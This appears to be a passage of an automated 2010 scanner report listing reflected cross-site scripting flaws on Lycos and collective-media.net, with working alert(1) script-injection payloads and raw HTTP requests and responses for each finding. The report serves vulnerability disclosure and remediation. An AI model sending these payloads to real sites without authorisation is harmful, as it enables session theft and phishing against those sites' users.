1.365. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.366. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.367. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.368. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.369. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.370. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.371. http://search.lycos.com/ [diktfc cookie]

1.372. http://search.lycos.com/ [diktfc cookie]

1.373. http://search.lycos.com/bootstrap.js [diktfc cookie]

1.374. http://search.lycos.com/bootstrap.js [diktfc cookie]

1.375. http://search.lycos.com/default.asp [diktfc cookie]

1.376. http://search.lycos.com/default.asp [diktfc cookie]

1.377. http://search.lycos.com/image/ [diktfc cookie]

1.378. http://search.lycos.com/image/ [diktfc cookie]

1.379. http://search.lycos.com/video/ [diktfc cookie]

1.380. http://search.lycos.com/video/ [diktfc cookie]



1. Cross-site scripting (reflected)
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/ad/cm.idg_b2c/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.idg_b2c/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4f7<script>alert(1)</script>eae69146b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 69
Date: Sun, 12 Dec 2010 14:26:56 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/

1.2. http://a.collective-media.net/ad/idgt.lycos/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ca2<script>alert(1)</script>2c491182556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;sz=728x90;ord=123456789?\ HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 109
Date: Sun, 12 Dec 2010 14:26:55 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

unknown path /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;cmw=nurl;sz=728x90;ord=123456789

1.3. http://a.collective-media.net/adj/cm.idg_b2c/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf0b'-alert(1)-'46a749859b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;ord=5241744? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;net=cm;ord=5241744;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3623'-alert(1)-'5d6c2e0b2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.idg_b2c/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57e3'-alert(1)-'64cfe680192 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?e57e3'-alert(1)-'64cfe680192 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 436
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.idg_b2c/;sz=728x90;net=cm;ord=5241744?e57e3'-alert(1)-'64cfe680192;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/idgt.lycos/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93955'-alert(1)-'f68ab19aedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;ord=123456789? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;net=idgt;ord=123456789;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e41'-alert(1)-'e57b49161fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.8. http://a.collective-media.net/adj/idgt.lycos/ [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a4b'-alert(1)-'bb4ad577c5f was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.9. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d086f'-alert(1)-'0c5afc10a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7161

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-75049847_1292163999","http://ad.doubleclick.net/adjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;net=idgt;u=,idgt-75049847_1292163999,,webdevelopment,;;tile=1;cmw=owl;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.10. http://a.collective-media.net/cmadj/idgt.lycos/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f15f'-alert(1)-'146c6c088c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7153

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-61396396_1292163999","http://ad.doubleclick.net/adj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;net=idgt;u=,idgt-61396396_1292163999,,webdevelopment,;;tile=1;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c5'-alert(1)-'3504f397cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;&717c5'-alert(1)-'3504f397cdd=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 12 Dec 2010 14:26:57 GMT
Content-Length: 7117
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
pt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-96303716_1292164017","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-96303716_1292164017,,none,;;tile=1;sz=728x90;net=idgt;&717c5'-alert(1)-'3504f397cdd=1;contx=none;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt>
...[SNIP]...

1.12. http://a.collective-media.net/cmadj/idgt.lycos/ [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/idgt.lycos/

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49010'-alert(1)-'a3461bb3ff4 was submitted in the tile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/idgt.lycos/;tile=49010'-alert(1)-'a3461bb3ff4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7074

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-3700236_1292163998","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-3700236_1292163998,,none,;;tile=49010'-alert(1)-'a3461bb3ff4;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt>
...[SNIP]...

1.13. http://advertising.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842fd"><script>alert(1)</script>7285f314683 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images842fd"><script>alert(1)</script>7285f314683 HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images842fd"><script>alert(1)</script>7285f314683&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.14. http://advertising.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce66"><script>alert(1)</script>ebf8b4cdc1d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&cat=images HTTP/1.1
Host: advertising.lycos.com
